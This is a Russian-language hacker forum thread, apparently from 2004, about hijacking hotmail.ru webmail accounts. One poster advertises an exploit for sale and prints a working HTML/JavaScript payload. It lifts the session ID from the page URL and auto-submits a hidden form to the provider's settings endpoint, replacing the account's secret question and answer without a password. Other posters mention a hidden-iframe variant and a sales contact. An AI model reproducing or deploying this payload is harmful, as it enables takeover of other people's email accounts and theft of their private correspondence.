*** сколько можно говорить... не сломаешь ты хотмаил, если и есть спсобы то только приватные..
Все! 2-а дня мучений и эксплойт готов. Експлойт пока работает только с веб интерфейсом. То есть юзер должен проверять ящик именно через веб интерфейс.Работает все так что при открытие письма, выполняется js, который меняет нужные данные, и дает нам пароль. Продам эксплойт за каких то 10$.... стучите в 5895544... Щас работаю над тем чтобы скрипт пахал через любое почт. программу. (the bat, аутлук и тд).... Вообщето я ни чего продавать не хотел, но просто очень ща деньги нужны
Во-первых, я не считаю, что там есть xss, которое изменяет какие-либо параметры .. Это было бы слишком просто ... Во-вторых, я так и непонял, что ты хотел сказать имея ввиду работу скрипта через почтовую программу ... Я могу ошибаться, но по-моему это развод ...
Да это развод, только явно не вас. Есть 2-е формы секретный вопрос и секретный ответ... Есть форма настроек данных и есть поле маил. На все эти формы пароль не требуется Под почтовый клиент, естественно js может и не пахать(например в бате), поэтому придется крепить html'ку. Это конечно пока толька идеи, но мне кажется что ид-ешник получится вытащить из хистори(так как в почтовом клиенте больше ее вы тащить не откуда). Для особо не верущих этот код: <html> <script> var stroka=location+'#'; var sid=stroka.substr(98,32); </script> <form method="POST" name="forma"> <INPUT type="hidden" name="session_id"> <INPUT type="hidden" value="1" name="cp_msg"> <INPUT type="hidden" value="1" name="__post"> <INPUT type="hidden" name="cp_quest" value="Ни рыба, ни мясо?и не курица тоже"> <INPUT type="hidden" name="cp_answ" value="321123"> <INPUT type="hidden" method="POST" value="Внести изменения"> </form> <script> forma.action="http://www4.nm.ru/users/chpass.dhtml?session_id="+sid; forma.session_id.value=sid; document.forma.submit() </script> </html> Этот js меняет лишь секретный вопрос и ответ... з.ы. Скрипт работает только в прикрепленном файле с именем "Ready exploit for hotmail.ru.html". Сами понимаите измените имя фаила, изменится локатион. Скрипт работает только вод веб-интерфейсом Это так сказать тестовая версия За полной обращайтесь в фсб)
странно, может багу пофиксили уже, но месяц назад просто скрытым фреймом мне удалось сменить секретный вопрос и ответ на праре ящиков...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'> мдя... если про .com речь, то имхо оч. сложно... SSL какникак... да и фиксят поди всё вовремя
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'> Бля не заметил (Во что пиво с людьми делает) НУ и пох.... короче если кому експлойт под хотмеил.РУ нужон, стучите
